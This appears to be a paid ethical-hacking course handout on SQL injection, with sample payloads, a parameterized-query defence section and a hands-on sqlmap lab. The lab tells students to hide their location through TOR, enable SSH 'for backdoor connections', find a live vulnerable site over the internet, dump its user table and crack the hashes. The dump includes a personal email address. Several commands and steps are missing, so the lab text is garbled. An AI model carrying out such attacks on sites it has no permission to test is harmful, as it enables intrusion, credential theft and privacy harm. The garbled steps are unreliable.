Professional Documents
Culture Documents
11 - SQL Injection Attack - Requires Internet
11 - SQL Injection Attack - Requires Internet
📍 Suite 1611 16th Floor AIC Burgundy Empire Tower ADB Ave corner Garnet Road Ortigas Center Pasig
☎ Smart: 09998165357 ☎ PLDT: 788-1419 📧 kdoz@live.com 🌐 www.nexusph.net
This is an intellectual property of Nexus Education services. Reproduction and distribution without consent will be sued to the court of Law.
The law: Republic Act No. 8293 [An Act Prescribing the Intellectual Property Code and Establishing the Intellectual Property Office, Providing for Its Powers and Functions, and for Other
Purposes] otherwise known as the Intellectual Property Code of the Philippines
▪ SQL injection is a code injection technique that might destroy your database.
▪ SQL injection is the placement of malicious code in SQL statements, via web page input.
Look at the following example which creates a SELECT statement by adding a variable (txtUserId) to a select string.
The variable is fetched from user input (getRequestString):
If there is nothing to prevent a user from entering "wrong" input, the user can enter some "smart" input like this:
UserId:
105 OR 1=1
Does the example above look dangerous? What if the "Users" table contains names and passwords?
SELECT UserId, Name, Password FROM Users WHERE UserId = 105 or 1=1;
A hacker might get access to all the user names and passwords in a database, by simply inserting 105 OR 1=1 into
the input field.
Username:
John Doe
Password:
myPass
Example
uName = getRequestString("username");
1
NEXUS EDUCATION SERVICES
📍 Suite 1611 16th Floor AIC Burgundy Empire Tower ADB Ave corner Garnet Road Ortigas Center Pasig
☎ Smart: 09998165357 ☎ PLDT: 788-1419 📧 kdoz@live.com 🌐 www.nexusph.net
This is an intellectual property of Nexus Education services. Reproduction and distribution without consent will be sued to the court of Law.
The law: Republic Act No. 8293 [An Act Prescribing the Intellectual Property Code and Establishing the Intellectual Property Office, Providing for Its Powers and Functions, and for Other
Purposes] otherwise known as the Intellectual Property Code of the Philippines
uPass = getRequestString("userpassword");
sql = 'SELECT * FROM Users WHERE Name ="' + uName + '" AND Pass ="' + uPass + '"'
Result
SELECT * FROM Users WHERE Name ="John Doe" AND Pass ="myPass"
A hacker might get access to user names and passwords in a database by simply inserting " OR ""=" into the user
name or password text box:
User Name:
" or ""="
Password:
" or ""="
The code at the server will create a valid SQL statement like this:
Result
SELECT * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""=""
The SQL above is valid and will return all rows from the "Users" table, since OR ""="" is always TRUE.
A batch of SQL statements is a group of two or more SQL statements, separated by semicolons.
The SQL statement below will return all rows from the "Users" table, then delete the "Suppliers" table.
Example
SELECT * FROM Users; DROP TABLE Suppliers
Look at the following example:
Example
txtUserId = getRequestString("UserId");
txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;
And the following input:
User id:
105; DROP TABLE Suppliers
Result
SELECT * FROM Users WHERE UserId = 105; DROP TABLE Suppliers;
Use SQL Parameters for Protection
To protect a web site from SQL injection, you can use SQL parameters.
SQL parameters are values that are added to an SQL query at execution time, in a controlled manner.
2
NEXUS EDUCATION SERVICES
📍 Suite 1611 16th Floor AIC Burgundy Empire Tower ADB Ave corner Garnet Road Ortigas Center Pasig
☎ Smart: 09998165357 ☎ PLDT: 788-1419 📧 kdoz@live.com 🌐 www.nexusph.net
This is an intellectual property of Nexus Education services. Reproduction and distribution without consent will be sued to the court of Law.
The law: Republic Act No. 8293 [An Act Prescribing the Intellectual Property Code and Establishing the Intellectual Property Office, Providing for Its Powers and Functions, and for Other
Purposes] otherwise known as the Intellectual Property Code of the Philippines
The SQL engine checks each parameter to ensure that it is correct for its column and are treated literally, and not
as part of the SQL to be executed.
Another Example
txtNam = getRequestString("CustomerName");
txtAdd = getRequestString("Address");
txtCit = getRequestString("City");
txtSQL = "INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)";
db.Execute(txtSQL,txtNam,txtAdd,txtCit);
Examples
The following examples shows how to build parameterized queries in some common web languages.
txtUserId = getRequestString("UserId");
sql = "SELECT * FROM Customers WHERE CustomerId = @0";
command = new SqlCommand(sql);
command.Parameters.AddWithValue("@0",txtUserID);
command.ExecuteReader();
INSERT INTO STATEMENT IN ASP.NET:
txtNam = getRequestString("CustomerName");
txtAdd = getRequestString("Address");
txtCit = getRequestString("City");
txtSQL = "INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)";
command = new SqlCommand(txtSQL);
command.Parameters.AddWithValue("@0",txtNam);
command.Parameters.AddWithValue("@1",txtAdd);
command.Parameters.AddWithValue("@2",txtCit);
command.ExecuteNonQuery();
INSERT INTO STATEMENT IN PHP:
3
NEXUS EDUCATION SERVICES
📍 Suite 1611 16th Floor AIC Burgundy Empire Tower ADB Ave corner Garnet Road Ortigas Center Pasig
☎ Smart: 09998165357 ☎ PLDT: 788-1419 📧 kdoz@live.com 🌐 www.nexusph.net
This is an intellectual property of Nexus Education services. Reproduction and distribution without consent will be sued to the court of Law.
The law: Republic Act No. 8293 [An Act Prescribing the Intellectual Property Code and Establishing the Intellectual Property Office, Providing for Its Powers and Functions, and for Other
Purposes] otherwise known as the Intellectual Property Code of the Philippines
As a responsible ethical hacker, security engineer or penetration tester you should be familiar with the tools to
perform a penetration testing
HANDS-ON LAB:
Lab Objectives:
Lab Duration:
▪ Time: 45 minutes
Lab Environment
▪ You need internet connection
Lab Tasks
▪ To inject SQL statement for penetration testing
Tools
sqlmap
Step-by-Steps Instructions
Before doing an SQL injection attack and you must configure your network connection to use the free routing service
from TOR so they will not detect your physical location from the internet and also enable SSH for backdoor
connections
Step 1. Disable the default key and generate a new ssh key set
cd /etc/ssh
mkdir keys_backup_ssh
mv ssh_host_* keys_backup_ssh
dpkg-reconfigure openssh-server
4
NEXUS EDUCATION SERVICES
📍 Suite 1611 16th Floor AIC Burgundy Empire Tower ADB Ave corner Garnet Road Ortigas Center Pasig
☎ Smart: 09998165357 ☎ PLDT: 788-1419 📧 kdoz@live.com 🌐 www.nexusph.net
This is an intellectual property of Nexus Education services. Reproduction and distribution without consent will be sued to the court of Law.
The law: Republic Act No. 8293 [An Act Prescribing the Intellectual Property Code and Establishing the Intellectual Property Office, Providing for Its Powers and Functions, and for Other
Purposes] otherwise known as the Intellectual Property Code of the Philippines
Running TOR
We have to be anonymous on the internet using TOR which provides free access to free router so I already installed
TOR
Step 1. Update the number of proxy that our kali will use to the tor network bye disabling the strict chain & enable
the dynamic chain so type the following command
#Strict_chain
dynamic_chain
Step 4. Add socks 5. Go to the end of the file and add an entry
firefox www.whatismyip.com ;this will identify your current location or that you are in Philippines
Answer the captcha and click verify. Copy the code and enter in the box
you should now be in another country if that doesn’t work try www.cmyip.com in firefox
5
NEXUS EDUCATION SERVICES
📍 Suite 1611 16th Floor AIC Burgundy Empire Tower ADB Ave corner Garnet Road Ortigas Center Pasig
☎ Smart: 09998165357 ☎ PLDT: 788-1419 📧 kdoz@live.com 🌐 www.nexusph.net
This is an intellectual property of Nexus Education services. Reproduction and distribution without consent will be sued to the court of Law.
The law: Republic Act No. 8293 [An Act Prescribing the Intellectual Property Code and Establishing the Intellectual Property Office, Providing for Its Powers and Functions, and for Other
Purposes] otherwise known as the Intellectual Property Code of the Philippines
Step 1. We need to find a test site which is vulnerable for SQL injection
Step 2. To list all the database from this company, open a new terminal and type
Database: em_main
[138 tables]
+------------------------------+
| bots_activity |
| bots_armors |
| jordan_CustomFieldMap |
| jordan_DataItem |
| jordan_Derivative |
| jordan_DerivativeImage |
| jordan_DerivativePrefsMap |
| jordan_DescendentCountsMap |
| jordan_Entity |
.
.
.
| jordan_SessionMap |
| jordan_ThumbnailImage |
| jordan_UnknownItem |
| jordan_User |
| jordan_UserGroupMap |
| jordan_WatermarkImage |
| jordan_WebDavLockMap |
| zbots_wiki_hitcounter |
| zbots_wiki_text |
+------------------------------+
6
NEXUS EDUCATION SERVICES
📍 Suite 1611 16th Floor AIC Burgundy Empire Tower ADB Ave corner Garnet Road Ortigas Center Pasig
☎ Smart: 09998165357 ☎ PLDT: 788-1419 📧 kdoz@live.com 🌐 www.nexusph.net
This is an intellectual property of Nexus Education services. Reproduction and distribution without consent will be sued to the court of Law.
The law: Republic Act No. 8293 [An Act Prescribing the Intellectual Property Code and Establishing the Intellectual Property Office, Providing for Its Powers and Functions, and for Other
Purposes] otherwise known as the Intellectual Property Code of the Philippines
Step 4. To list the columns available from the table jordan_user, type
Database: em_main
Table: jordan_User
[7 columns]
+------------------+--------------+
| Column | Type |
+------------------+--------------+
| g_email | varchar(255) |
| g_fullName | varchar(128) |
| g_hashedPassword | varchar(128) |
| g_id | int(11) |
| g_language | varchar(128) |
| g_locked | int(1) |
| g_userName | varchar(32) |
+------------------+--------------+
Step 5. To dump the users email, fullname, password & username, type
g_email,g_fullName,g_hashedPassword,g_userName --dump
Database: em_main
Table: jordan_User
[2 entries]
+----------------------------+-----------------------+--------------------------------------+------------+
| g_email | g_fullName | g_hashedPassword | g_userName |
+----------------------------+-----------------------+--------------------------------------+------------+
| NULL | Guest | Oq]C664b3c59e82f20ff2151259896244310 | guest |
| jdrobins@student.umass.edu | Gallery Administrator | dcl`bae71e101be8af16bd141c60d3e25e3a | jordan |
+----------------------------+-----------------------+--------------------------------------+------------+
Step 6. To crack the password of the user use ophcrack or Ncrack discuessed in the previous lessons or future lessons
Result of penetration testing: by now you should know how attacker perform SQL injection to gather the
username and password from the database
Question: As a Nexus Ethical Hacker what should you do to protect your company from SQL injection?